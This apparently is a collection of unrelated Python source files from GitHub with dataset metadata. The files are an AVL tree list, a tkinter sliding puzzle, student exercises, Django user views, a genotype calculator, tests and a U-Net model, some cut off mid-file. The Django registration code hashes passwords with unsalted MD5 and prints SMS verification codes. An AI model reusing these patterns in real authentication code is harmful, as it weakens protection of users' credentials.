nodeToCheckBF.getParent()\n\t\t\telif abs(balanceFactor) < 2:\n\t\t\t\tnodeToCheckBF.recomputeHeight()\n\t\t\t\tnodeToCheckBF.recomputeSize()\n\t\t\t\tif nodeToCheckBF.getHeight() != height:\n\t\t\t\t\tbalanceOps += 1\n\t\t\tnodeToCheckBF = nodeToCheckBF.getParent()\n\n\n\t\treturn balanceOps\n\n\t\"\"\" Applies the correct rotation to the tree, during rebalance process\n\t \n\t@type BFcriminal: AVLNode\n\t@pre: BFcriminal is not None\n\t@param BFcriminal: a node that its BalanceFactor violating the AVLTreeList balance rules (+2/-2)\n\t\n\t@type balanceFactor: int\n\t@param balanceFactor: the balance factor of BFcriminal\n\t\n\t@rtype: int\n\t@return: number of balancing operations that took place\n\t\"\"\"\n\n\tdef rotate(self, BFcriminal, balanceFactor):\n\t\tbalanceOps = 0\n\t\tif balanceFactor == 2:\n\t\t\tif BFcriminal.getLeft().getBalanceFactor() in [0, 1]:\n\t\t\t\tself.rightRotation(BFcriminal)\n\t\t\t\tbalanceOps += 1\n\t\t\telif BFcriminal.getLeft().getBalanceFactor() == -1:\n\t\t\t\tself.leftThenRightRotation(BFcriminal)\n\t\t\t\tbalanceOps += 2\n\n\t\telif balanceFactor == -2:\n\t\t\tif BFcriminal.getRight().getBalanceFactor() in [-1, 0]:\n\t\t\t\tself.leftRotation(BFcriminal)\n\t\t\t\tbalanceOps += 1\n\t\t\telif BFcriminal.getRight().getBalanceFactor() == 1:\n\t\t\t\tself.rightThenLeftRotation(BFcriminal)\n\t\t\t\tbalanceOps += 2\n\t\treturn balanceOps\n\n\n\t\"\"\"returns the value of the first item in the list\n\n\t@rtype: str\n\t@returns: the value of the first item, None if the list is empty\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef first(self):\n\t\tif self.first_node is not None:\n\t\t\treturn self.first_node.getValue()\n\t\treturn None\n\n\t\"\"\"returns a pointer to the first node\n\t@rtype: AVLNode\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef get_First(self):\n\t\treturn self.first_node\n\n\t\"\"\"sets the first item of the list to a given node\n\t\n\t@param node: a pointer to a AVLNode\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef set_First(self, node):\n\t\tself.first_node = node\n\n\t\"\"\"returns the value of the last item in the list\n\n\t@rtype: str\n\t@returns: the value of the last item, None if the list is empty\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef last(self):\n\t\tif self.last_node is not None:\n\t\t\treturn self.last_node.getValue()\n\t\treturn None\n\n\t\"\"\"return a pointer to the last item in the list\n\t@param node: a pointer to AVLNode\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef get_Last(self):\n\t\treturn self.last_node\n\n\t\"\"\"sets the last item 
of the list to a given node\n\t\n\t@param node: a pointer to a node\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef set_Last(self, node):\n\t\tself.last_node = node\n\n\n\t\"\"\"returns an array representing list \n\n\t@rtype: list\n\t@returns: a list of strings representing the data structure\n\t\n\tTime Complexity:\n\tInitiliazing an empty list - O(1)\n\tget_First() - returns an attribute of self, without any calculations - O(1)\n\t\n\tConclusion from recitation 3 ex 3 - starting at the minimal element of a tree and calling \n\tn-1 times to successor\n\tis O(n) work since we go through every edge (there are n-1 edges) at most 2 times.\n\tPlus,\n\t\tnode is not None - O(1), n times -> O(n)\n\t\tlst.append(node.getValue()) - O(1), n times -> O(n)\n\t\t\n\tTherefore, the entire while loop takes O(n) time in the worst case.\n\t\"\"\"\n\tdef listToArray(self):\n\t\tlst = []\n\t\tnode = self.get_First()\n\t\twhile node is not None:\n\t\t\tlst.append(node.getValue())\n\t\t\tnode = self.successor(node)\n\t\treturn lst\n\n\t\"\"\"returns the size of the list \n\n\t@rtype: int\n\t@returns: the size of the list\n\t\"\"\"\n\tdef length(self):\n\t\tif not self.empty():\n\t\t\treturn self.root.getSize()\n\t\t# returns 0 if list is empty\n\t\treturn 0\n\n\t\"\"\"returns the successor of a given node\n\t\n\t@pre: node.isRealNode() == True\n\t@type node: AVLNode\n\t@param node: the node of which we will return its successor\n\t@rtype: AVLNode\n\t@returns: The successor of node, None if node is the last element in the list\n\t\n\tTime complexity:\n\tAs we saw in the lecture the time complexity analysis is in the worst case O(h) = O(logn)\n\tIn case that node == self.get_Last() then O(1)\n\t\"\"\"\n\tdef successor(self, node):\n\t\tif node == self.get_Last():\n\t\t\treturn None\n\n\t\tx = node\n\t\tif x.getRight().isRealNode():\n\t\t\treturn self.minimum(x.getRight())\n\t\ty = x.getParent()\n\t\twhile y is not None and x == y.right:\n\t\t\tx = y\n\t\t\ty = x.parent\n\t\treturn y\n\n\t\"\"\"returns the minimum of a given sub tree that node is its root\n\ti.e. the deepest node that is on the `/` branch that starts from node\n\t\n\t@pre: node.isRealNode() == True\n\t@type node: AVLNode\n\t@param node: the node of which we will return the minimum of his subtree\n\t@rtype: AVLNode\n\t@returns: The minimum of node's subtree, if it is a leaf, returns itself\n\t\n\tTime complexity:\n\tminimum = node - O(1)\n\t(*) minimum.getLeft() is not None && minimum = minimum.getLeft() are O(1) each\n\t(*) is executed at most as many times as the height of the tree.\n\tTherefore, the total time complexity is O(h) = O(logn).\n\t\"\"\"\n\tdef minimum(self, node):\n\t\tminNode = node\n\t\twhile minNode.getLeft().isRealNode():\n\t\t\tminNode = minNode.getLeft()\n\t\treturn minNode\n\n\t\"\"\"returns the maximum of a given sub tree that node is its root\n\ti.e. 
the deepest node that is on the `\\` branch that starts from node\n\n\t@pre: node.isRealNode() == True\n\t@type node: AVLNode\n\t@param node: the node of which we will return the maximum of his subtree\n\t@rtype: AVLNode\n\t@returns: The maximum of node's subtree, if it is a leaf, returns itself\n\n\tTime complexity:\n\tmaximum = node - O(1)\n\t(*) maximum.getRight() is not None && maximum = maximum.getRight() are O(1) each\n\t(*) is executed at most as many times as the height of the tree.\n\tTherefore, the total time complexity is O(h) = O(logn).\n\t\"\"\"\n\tdef maximum(self, node):\n\t\tmaxNode = node\n\t\twhile maxNode.getRight().isRealNode():\n\t\t\tmaxNode = maxNode.getRight()\n\t\treturn maxNode\n\n\t\"\"\"\n\tfind left subtree with height h\n\thelp function for join\n\t@pre - h>=0\n\t@rtype: AVLNode\n\tTime complexity: O(self.getRoot().getHeight()-h)\n\t\"\"\"\n\tdef find_left_subtree_heightH(self, h):\n\t\tif self.getRoot().getHeight() == h:\n\t\t\treturn self.getRoot()\n\t\tnode = self.getRoot()\n\t\thelp = node\n\t\twhile h < node.getHeight():\n\t\t\thelp = node\n\t\t\tnode = node.getLeft()\n\t\treturn node\n\n\t\"\"\"\n\tfind right subtree with height h\n\thelp function for join\n\t@pre - h>=0\n\t@rtype: AVLNode\n\tTime complexity: O(self.getRoot().getHeight()-h)\n\t\"\"\"\n\tdef find_right_subtree_heightH(self, h):\n\t\tif self.getRoot().getHeight() == h:\n\t\t\treturn self.getRoot()\n\t\tnode = self.getRoot()\n\t\thelp = node\n\t\twhile h < node.getHeight():\n\t\t\thelp = node\n\t\t\tnode = node.getRight()\n\t\treturn node\n 0\n        ]\n\n        return creased_edges\n\n\n# --------------------------------------------------------------------------------------------\n\n# module name\n# print(__name__)\n# --------------------------------------------------------------------------------------------\n# Notes\n# --------------------------------------------------------------------------------------------\n","repo_name":"m3trik/tentacle","sub_path":"tentacle/slots/maya/crease.py","file_name":"crease.py","file_ext":"py","file_size_in_byte":10296,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"35"} +{"seq_id":"30609198641","text":"#\n# File containing application logic\n#\n#\n\n# Dependencies\nimport tkinter as tk\nfrom functools import partial\nimport random\n\n# Initialise application class\nclass Application(tk.Frame):\n    # Define constructor\n    def __init__(self, size, master=None):\n        super().__init__(master)\n        # Initialise variables\n        self.master = master\n        self.grid()\n        self.size = size\n        # Initialise variable to hold position of empty tile\n        self.empty = [self.size-1,self.size-1]\n        # Initialise array to hold position of each tile\n        self.position = []\n        for i in range(self.size*self.size-1):\n            self.position.append( [int(i/self.size), int(i%self.size)] )\n        # Call function to add widgets\n        self.create_widgets()\n\n    # Function to add widgets\n    def create_widgets(self):\n        # Initialise array for buttons\n        self.button = []\n        # Initialise buttons for tiles\n        for i in range(self.size*self.size-1):\n            # Initialise button\n            self.button.append( tk.Button(self, text=str(i), relief=\"sunken\") )\n            self.button[i].grid(row = int(i/self.size), column = int(i%self.size), padx = 1, pady = 1)\n            self.button[i][\"command\"] = partial(self.swapButton, i)\n\n        # Initialise button to shuffle tiles\n        self.shuffle = tk.Button(self, text=\"Shuffle\", command=self.shuffle_tiles)\n        # Initialise button to reset tiles\n        self.reset = tk.Button(self, text=\"Reset\", command=self.reset_tiles)\n        # Set position for shuffle and reset buttons\n        if self.size%2==0:\n            self.shuffle.grid(column=0, row=self.size, columnspan=int(self.size/2))\n            self.reset.grid(column=int(self.size/2), row=self.size, columnspan=int(self.size/2))\n        else:\n            
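# With an odd number of columns the row cannot be split evenly, so the\n            # reset button starts one column to the right of the midpoint column.\n            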
self.shuffle.grid(column=0, row=self.size, columnspan=int(self.size/2))\n self.reset.grid(column=int(self.size/2)+1, row=self.size, columnspan=int(self.size/2))\n\n # Function to swap positions\n def swapPosition(self, pos):\n # Swap positions\n temp = self.position[pos]\n self.position[pos] = self.empty\n self.empty = temp\n\n # Function to move button\n def swapButton(self, pos):\n # Check if button is adjacent to empty tile\n if self.position[pos][0] == self.empty[0] and abs(self.position[pos][1]-self.empty[1]) < 2:\n # Call function to swap positions\n self.swapPosition(pos)\n elif self.position[pos][1] == self.empty[1] and abs(self.position[pos][0]-self.empty[0]) < 2:\n # Call function to swap positions\n self.swapPosition(pos)\n # Call function to refresh display\n self.refresh_display()\n\n # Function to shuffle tiles\n def shuffle_tiles(self):\n # Seed random number generator\n random.seed()\n for count in range(100):\n # Initialise array to hold positions adjacent to empty tile\n temp = []\n # Get list of positions adjacent to empty position\n for i in range(self.size*self.size-1):\n # Check if distance between current tile and empty tile is 1\n if abs(self.position[i][0] - self.empty[0]) + abs(self.position[i][1] - self.empty[1]) == 1:\n # Append position to array\n temp.append(i)\n # Select a random position from array\n randpos = temp[ random.randint(0, len(temp)-1) ]\n self.swapPosition(randpos)\n # Call function to update display\n self.refresh_display()\n\n # Function to reset tiles\n def reset_tiles(self):\n # Set tile positions to original value\n for i in range(self.size*self.size-1):\n self.position[i] = [int(i/self.size), int(i%self.size)]\n # Set empty tile to original position\n self.empty = [self.size-1,self.size-1]\n # Call function to update display\n self.refresh_display()\n\n # Function to refresh display\n def refresh_display(self):\n # Iterate over buttons\n for i in range(self.size*self.size-1):\n self.button[i].grid(row = self.position[i][0], column = self.position[i][1])\n","repo_name":"NithishRaja/sliding_puzzle","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14158974394","text":"#ringid = int(input('Sisestage ringide arv: '))\r\n#\r\n#porgandid = 0\r\n#i = 0\r\n#\r\n#for mitu_paaris_ringi_on in range(ringid):\r\n# if mitu_paaris_ringi_on % 2 == 0:\r\n# i += 1\r\n# porgandid += 2\r\n# \r\n#if ringid%2 != 0:\r\n# porgandid -= 2\r\n# \r\n#porgandid2 = porgandid * i\r\n#\r\n#print('Porgandite koguarv on ' + str(porgandid2) + \".\")\r\n\r\n\r\nfail = open(\"rebased.txt\", encoding=\"UTF-8\")\r\n\r\naasta = int(input('Palun sisestage, millise aasta andmeid vajate: '))\r\n\r\nvastuvõetud = []\r\n\r\nfor rida in fail:\r\n vastuvõetud.append(int(rida))\r\nfail.close()\r\n\r\nfor j in range(len(vastuvõetud)):\r\n if j + 2011 == aasta:\r\n print(str(aasta) + '. 
aastal oli vastuvõetuid ' + str(vastuvõetud[j]))\r\n ","repo_name":"saskia002/Proge-testid","sub_path":"Py/proge UT/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35319953544","text":"import hashlib\nimport json\nimport re\nimport time\nimport jwt\nimport random\n\nfrom django.http import JsonResponse\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.conf import settings\nfrom django.core.cache import cache\n\n# Create your views here.\nfrom user.models import UserProfile\nfrom tools.login_dec import login_check\nfrom tools.sms import YunTongXin\nfrom .tasks import task_test\n\nclass UserView(View):\n def get(self, request, username):\n if username:\n # 返回某个用户信息\n try:\n user = UserProfile.objects.get(username=username)\n except:\n result = {'code': 10103, 'error': '用户不存在'}\n return JsonResponse(result)\n keys = request.GET.keys()\n if keys:\n data = {}\n for k in keys:\n if k == 'password':\n continue\n if hasattr(user, k):\n data[k] = getattr(user, k)\n result = {'code': 200, 'username': user.username,\n 'data': data}\n else:\n result = {'code': 200, 'username': user.username,\n 'data': {'info': user.info,\n 'sign': user.sign,\n 'nickname': user.nikename,\n # str返回路径信息\n 'avatar': str(user.avatar)}}\n return JsonResponse(result)\n\n def post(self, request):\n # 1获取json字符串\n json_str = request.body\n # 2反序列化\n py_obj = json.loads(json_str)\n # 获取每个数据\n username = py_obj['username']\n email = py_obj['email']\n phone = py_obj['phone']\n password_1 = py_obj['password_1']\n password_2 = py_obj['password_2']\n sms_num=py_obj['sms_num']\n # 效验逻辑问题\n # 用户名为空\n if not username:\n result = {'code': 10001, 'error': '用户名为空'}\n return JsonResponse(result)\n # 验证密码一致\n if password_1 != password_2:\n result = {'code': 10002, 'error': '两次密码不一致'}\n return JsonResponse(result)\n #验证码比较\n #从redis中获取验证吗\n cache_key = 'sms_%s' % phone\n code=str(cache.get(cache_key))\n print(code)\n #对比两个验证码\n if sms_num!=code:\n result={'code':10015,'error':'验证码错误'}\n return JsonResponse(result)\n\n # 用ma5加密密码\n password = hashlib.md5(password_1.encode()).hexdigest()\n # 添加进入数据库\n try:\n UserProfile.objects.create(username=username,\n email=email,\n phone=phone,\n password=password)\n except:\n reslut = {'code': 10003, 'error': '用户名重复'}\n return JsonResponse(reslut)\n # 注册成功生产token\n token = make_token(username)\n token = token.decode()\n return JsonResponse({'code': 200,\n 'username': username,\n 'data': {'token': token}})\n\n # 函数装饰器转换成方法装饰器\n @method_decorator(login_check)\n def put(self, request, username):\n # 1获取json字符串\n json_str = request.body\n # 2反序列化\n py_obj = json.loads(json_str)\n # 获取user对象\n user = request.myuser\n # 获取每个数据\n user.nikename = py_obj['nickname']\n user.sign = py_obj['sign']\n user.info = py_obj['info']\n # 5.保存save\n user.save()\n result = {'code': 200}\n return JsonResponse(result)\n\n\ndef make_token(username, exp=3600 * 24):\n key = settings.JWT_TOKEN_KEY\n now = time.time()\n payload = {'username': username,\n 'exp': now + exp}\n return jwt.encode(payload, key)\n\n\n@login_check\ndef user_avatar(request, username):\n if request.method != 'POST':\n return JsonResponse({'code': 10130, 'error': '请求方式必须是post'})\n # 修改用户头像\n # 1,查2,改3,上传(改数据库可能不成功,应该try)\n # 验证token\n user = request.myuser\n user.avatar = request.FILES['avatar']\n user.save()\n result = {'code': 200}\n return JsonResponse(result)\n\n\ndef 
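check_token_example(token):\n    # Hypothetical helper (a sketch, not part of the original app): shows how a\n    # token produced by make_token above could be decoded and validated.\n    key = settings.JWT_TOKEN_KEY\n    try:\n        payload = jwt.decode(token, key, algorithms=['HS256'])\n    except jwt.ExpiredSignatureError:\n        return None\n    return payload['username']\n\n\ndef 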
sms_view(request):\n json_str = request.body;\n py_obj = json.loads(json_str)\n # 获取手机号,正则表达式验证\n phone = py_obj['phone']\n if is_phone(phone):\n # 缓存验证码\n # 生成键\n cache_key = 'sms_%s' % phone\n # 生成验证码\n code = random.randint(1000, 9999)\n #将验证码写入到redis中\n cache.set(cache_key,code,65)\n # 发送短信验证请求(同步)\n # x = YunTongXin(settings.SMS_ACCOUNT_ID,\n # settings.SMS_ACCOUNT_TOKEN,\n # settings.SMS_APP_ID,\n # settings.SMS_TEMPLATE_ID)\n # 应该try或者完善sms报错情况\n # res = x.run(phone, code)\n # 发送短信验证请求(异步)\n task_test.delay(phone,code)\n result = {'code': 200, }\n return JsonResponse(result)\n else:\n result = {'code': 10011, 'error': '请输入正确手机格式'}\n return JsonResponse(result)\n\n\n# 手机号是否正确\ndef is_phone(phone):\n phone_pat = re.compile('^(13\\d|14[5|7]|15\\d|166|17[3|6|7]|18\\d)\\d{8}$')\n res = re.search(phone_pat, phone)\n if not res:\n return False\n return True\n","repo_name":"snailwjiang/blog","sub_path":"blog/user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7646575968","text":"\"\"\"\n1. board의 요소를 list형태로 변환하기\n-> str은 str[0] = 'a'이런식으로 변환이 안되기 때문에 list형태로 변경\n\n2. board에서 2x2로 붙어있는 블럭 위치를 tmp에 저장하기\n\n3. tmp에 저장한 위치로 2x2 블럭위치를 공백으로 변경\n※ 만약 tmp가 비어있다면 없어지는 블럭이 없기에 break\n\n4. tmp안에 있는 모든 요소 삭제\n\n5. board에 공백부분을 채우기\n1) for문을 거꾸로해서 돌려서 밑에부터 공백을 채워나갈 거임 \n2) 현재 위치가 공백일 경우\n3) 1칸식 위로 가서 공백이 아닌 곳을 찾으면 그 값을 현재 위치에 저장\n\n6. 공백의 개수를 return 하기\n\"\"\"\n\ndef solution(m, n, board):\n answer = 0\n tmp = []\n \n for i in range(m):\n board[i] = list(board[i])\n \n while True:\n for i in range(m-1):\n for j in range(n-1):\n if board[i][j] != ' ':\n if board[i][j] == board[i][j+1] == board[i+1][j] == board[i+1][j+1]:\n tmp.append((i, j))\n \n if not tmp:\n break\n \n for i, j in tmp:\n board[i][j] = ' '\n board[i][j+1] = ' '\n board[i+1][j] = ' '\n board[i+1][j+1] = ' '\n \n tmp.clear()\n \n for i in range(m-1, 0, -1):\n for j in range(n):\n if board[i][j] == ' ':\n num = i - 1\n while num >= 0:\n if board[num][j] != ' ':\n board[i][j] = board[num][j]\n board[num][j] = ' '\n break\n num -= 1\n \n for i in board:\n answer += i.count(' ')\n \n return answer","repo_name":"guswnsakvk/Algorithm","sub_path":"programmers/2018_KAKAO_프렌즈4블록.py","file_name":"2018_KAKAO_프렌즈4블록.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8397252748","text":"\"\"\"Genotype module.\"\"\"\nimport sys\nimport scipy.stats\n\n\nclass Genotype(list):\n \"\"\"A Genotype object.\"\"\"\n\n def __init__(self, nref, nalt):\n \"\"\"\n Genotype object.\n\n nref is the amount of evidence supporting the reference allele,\n nalt is the evidence supporting an alternative allele.\n\n >>> Genotype(13750, 5257).genotype\n 'homozygous'\n \"\"\"\n self.nref = nref\n self.nalt = nalt\n self.genotype_likelihood()\n\n @property\n def reference(self):\n \"\"\"Return p-value decribing the probability that the genotype is reference.\"\"\"\n if len(self) == 3:\n return self[0]\n\n @property\n def heterozygous(self):\n \"\"\"Return p-value decribing the probability that the genotype is heterozygous.\"\"\"\n if len(self) == 3:\n return self[1]\n\n @property\n def homozygous(self):\n \"\"\"Return p-value decribing the probability that the genotype is homozygous.\"\"\"\n if len(self) == 3:\n return self[2]\n\n def genotype_likelihood(self):\n r\"\"\"\n Calculate genotype likelihood.\n\n P(g|D) = 
P(g)P(D|g)/sum(P(g')P(D|g')) where P(D|g) = Pbin(Nalt, Nalt + Nref)\n        :return:\n        \"\"\"\n        reference = 0.03\n        heterozygous = 0.5\n        homozygous = 0.97\n        genotypes = [reference, heterozygous, homozygous]\n        priors = [0.9, 0.05, 0.05]\n        nref = self.nref\n        nalt = self.nalt\n        pdg = {}\n        for g, prior in zip(genotypes, priors):\n            # data likelihood P(D|g)\n            pbin = scipy.stats.binom_test(nalt, nref + nalt, g, alternative='two-sided')\n            pdg[g] = pbin * prior\n        regularization = sum([pbinp for pbinp in pdg.values()])\n        if regularization == 0:\n            # This can happen if regularization is rounded to 0\n            regularization += sys.float_info.min\n        posterior = {g: p / regularization for g, p in pdg.items()}\n        self.append(posterior[reference])\n        self.append(posterior[heterozygous])\n        self.append(posterior[homozygous])\n        genotype_p = max([self.reference, self.heterozygous, self.homozygous])\n        if genotype_p == self.homozygous:\n            genotype = 'homozygous'\n        elif genotype_p == self.heterozygous:\n            genotype = 'heterozygous'\n        elif genotype_p == self.reference:\n            genotype = 'reference'\n        self.genotype = genotype\n","repo_name":"bardin-lab/readtagger","sub_path":"readtagger/genotype.py","file_name":"genotype.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"7347049854","text":"import unittest\n\nfrom should_dsl import should\n\nfrom Controller.Classe_Comunicacao import *\n\n\n\nclass Teste_Comunicacao(unittest.TestCase):\n\n\n    def teste_ler_serial_tipo_saida(self):\n        s = Classe_Comunicacao()\n        leitura = s.ler_serial()\n        leitura |should| be_kind_of(str)\n\n    def teste_ler_serial_verifica_integridade(self):\n        s = Classe_Comunicacao()\n        leitura = s.ler_serial()\n        leitura |should| be_like(r'^ID:[123]+,angulo:[0-9]+.[0-9]+,temperatura:[0-9]+.[0-9]+,tempo:[0-9]+.[0-9]+[|]ID:[123]+,angulo:[0-9]+.[0-9]+,temperatura:[0-9]+.[0-9]+,tempo:[0-9]+.[0-9]+[|]ID:[123]+,angulo:[0-9]+.[0-9]+,temperatura:[0-9]+.[0-9]+,tempo:[0-9]+.[0-9]+$')\n\n    def teste_formatar_pacote(self):\n        s = Classe_Comunicacao()\n        pacote = s.formatar_pacote(s.ler_serial())\n        pacote |should| be_kind_of(list)\n\n        for dicionario in pacote:\n            dicionario |should| be_kind_of(dict)\n\n    def teste_obter_brutos(self):\n        s = Classe_Comunicacao()\n        retorno = s.obter_dados_brutos()\n        retorno |should| be_kind_of(list)","repo_name":"RonaldLopes/tdd","sub_path":"Testes/TesteClasse_Comunicacao.py","file_name":"TesteClasse_Comunicacao.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2726587368","text":"# Using a while loop\nthislist = [\"apple\", \"banana\", \"cherry\"]\ni = 0\nwhile i < len(thislist):\n    print(thislist[i])\n    i = i + 1  # Don't forget to increment the index by 1 after each iteration.\n    \n# We use the len() function to determine the length of the list,\n# then start at 0 and loop over the list items, referring to them by their indexes.\n\n","repo_name":"Firuza25/PP2F","sub_path":"week2/Lists/32.py","file_name":"32.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11389676003","text":"\"\"\"\nID: mehvix1\nLANG: PYTHON3\nTASK: guess\n\nFeb 05, 2020\n\"\"\"\n\n\ndef count(lst, item):\n    count = 0\n    new_lst = []\n    for i in lst:\n        if i == item:\n            count += 1\n        else:\n            new_lst.append(i)\n\n    print([new_lst, count])\n    return [new_lst, count]\n\n\nfin = open('guess.in', 'r')\nfout = 
open('guess.out', 'w')\n\nlst = []\nfor _ in range(int(fin.readline())):\n lst.append(fin.readline().split()[2:])\n\n# flatten\nflat = []\nfor i in lst:\n for j in i:\n flat.append(j)\n\n# max occurring\nmax_shared = 1\nwhile flat:\n flat, shared = count(flat, flat[0])\n if shared > max_shared:\n max_shared = shared\n\nprint(max_shared)\nfinal = max_shared\nfout.write(str(final) + '\\n')\nfout.close()\n","repo_name":"Mehvix/competitive-programming","sub_path":"USACO/2018-2019/January/Bronze/3-guess/3-guess.py","file_name":"3-guess.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"37827270347","text":"default_max_speed = 30\ndefault_number_of_lanes = 1\ndefault_max_acceleration = 5\ndefault_max_deceleration = 5\ndefault_time_of_reaction = 1\n\nnumber_of_vertical_blocks = 10\nnumber_of_horizontal_blocks = 10\nblock_size = 100\n\ndefault_a_b_time = 100\ndefault_b_a_time = 100\ndefault_lag_time = 10\n","repo_name":"gabmis/cf","sub_path":"src/tools/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14503125044","text":"class Vehicle:\n def __init__(self, vehicle_color):\n self.vehicle_color = vehicle_color\n self.speed = 0\n\n def go(self, speed):\n self.speed = speed\n print(f'now going at speed {speed}')\n\n def __str__(self):\n return f'''\nVehicle Color: {self.vehicle_color} \nVehicle Speed: {self.speed}\n '''\n\n\nclass Plane(Vehicle):\n\n def go(self, speed):\n self.speed = speed\n print(f'now flying at speed {speed}')\n\n\nv1 = Vehicle('red')\nv1.go(50)\nprint(v1)\n\np1 = Plane('yellow')\np1.go(250)\nprint(p1)\n","repo_name":"MiriamKaplun/PCS-Homework","sub_path":"Python/47/hw47.py","file_name":"hw47.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72899681701","text":"\"\"\"\n@author: Duy Le \n\"\"\"\nfrom pytorch_toolbelt.modules.dsconv import DepthwiseSeparableConv2d\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data\nimport torch\nfrom pytorch_toolbelt.inference.functional import pad_image_tensor, unpad_image_tensor\nfrom pytorch_toolbelt.modules.encoders.timm.efficient_net import make_n_channel_input_conv2d_same\n\nimport timm\nfrom timm.models.efficientnet_blocks import DepthwiseSeparableConv, InvertedResidual\n# import sys\n# sys.path.append('..')\nfrom .modules import *\nfrom .model_util import init_weights, get_lr_parameters\n\n__all__ = [\n 'Attention_Unet', \n 'Unet_Encoder',\n 'resnet50_attunet', \n 'efficientnetb2_attunet', \n 'mobilenetv3_attunet',\n 'swin_tiny_attunet'\n]\n\nclass Unet_Encoder(nn.Module):\n def __init__(self, freeze_bn=True, backbone: str ='resnext50d_32x4d', freeze_backbone=False, pretrained=True):\n super(Unet_Encoder, self).__init__()\n if pretrained:\n if backbone.startswith('swin'):\n from .modules.swin_transformer import create_model\n # pretrained_model = timm.create_model(backbone, pretrained=False, num_classes=1)\n # pretrained_model.load_state_dict(torch.load('models/IDRiD/pretrained_models/model.bin'))\n \n # pretrained_dict = pretrained_model.state_dict()\n # encoder_dict = self.encoder.state_dict()\n # pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in encoder_dict}\n\n # encoder_dict.update(pretrained_dict) \n\n # 
self.encoder.load_state_dict(pretrained_dict)\n self.encoder = create_model(backbone)\n self.filters = self.encoder.num_features\n else:\n self.encoder = timm.create_model(backbone, features_only=True, pretrained=pretrained)\n self.filters = self.encoder.feature_info.channels()\n if freeze_bn:\n self.freeze_bn()\n if freeze_backbone:\n for param in self.encoder.parameters():\n param.requires_grad = False\n else:\n if backbone.startswith('swin'):\n from .modules.swin_transformer import create_model\n self.encoder = create_model(backbone, pretrained=False)\n self.filters = self.encoder.num_features\n else:\n self.encoder = timm.create_model(backbone, features_only=True, pretrained=False)\n self.filters = self.encoder.feature_info.channels()\n init_weights(self)\n\n def change_input_channels(self, input_channels: int, mode=\"auto\", **kwargs):\n self.encoder.conv_stem = make_n_channel_input_conv2d_same(\n self.encoder.conv_stem, input_channels, mode, **kwargs\n )\n return self\n\n def freeze_bn(self):\n for module in self.modules():\n if isinstance(module, nn.BatchNorm2d):\n module.eval()\n\n def forward(self, input):\n encoder_features = self.encoder(input)\n return encoder_features\n\n\nclass EfficientUnetBlock(nn.Module):\n def __init__(self, in_channels: int, out_channels: int, activation=Swish, drop_block_rate=0.0):\n super().__init__()\n self.ir = InvertedResidual(in_channels, out_channels, act_layer=activation, se_ratio=0.25, exp_ratio=4)\n self.drop = DropBlock2D(drop_block_rate, 2)\n # self.conv1 = nn.Sequential(\n # nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1, bias=False),\n # nn.BatchNorm2d(out_channels),\n # activation(inplace=True),\n # )\n # self.conv2 = nn.Sequential(\n # nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1, bias=False),\n # nn.BatchNorm2d(out_channels),\n # activation(inplace=True),\n # )\n self.conv1 = nn.Sequential(\n DepthwiseSeparableConv2d(out_channels, out_channels, kernel_size=3, padding=1) ,\n nn.BatchNorm2d(out_channels),\n activation(inplace=True),\n )\n self.conv2 = nn.Sequential(\n DepthwiseSeparableConv2d(out_channels, out_channels, kernel_size=3, padding=1) ,\n nn.BatchNorm2d(out_channels),\n activation(inplace=True),\n )\n\n def forward(self, x):\n x = self.ir(x)\n x = self.drop(x)\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\nclass Up_Atten(nn.Module):\n def __init__(self, in_ch, out_ch, bilinear = True):\n super(Up_Atten, self).__init__()\n self.atten = Attention_block(F_g=in_ch // 2, F_l=out_ch, F_int=in_ch)\n self.up_conv = DoubleConv(in_ch // 2 + out_ch, out_ch)\n if bilinear:\n self.up = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),\n nn.Conv2d(in_ch, in_ch // 2, kernel_size=3, padding=1)\n )\n else:\n self.up = nn.ConvTranspose2d(in_ch, in_ch // 2, kernel_size=4, stride=2, padding=1)\n self.out_ch = out_ch\n\n def forward(self, input1, input2):\n d2 = self.up(input1) \n d1 = self.atten(d2, input2)\n d2 = F.interpolate(d2, size=(d1.size(2), d1.size(3)), mode=\"bilinear\", align_corners=True)\n d = torch.cat([d1, d2], dim=1)\n return self.up_conv(d)\n \nclass Unet_Decoder(nn.Module):\n def __init__(self, encoder_channels, n_classes, dropout):\n 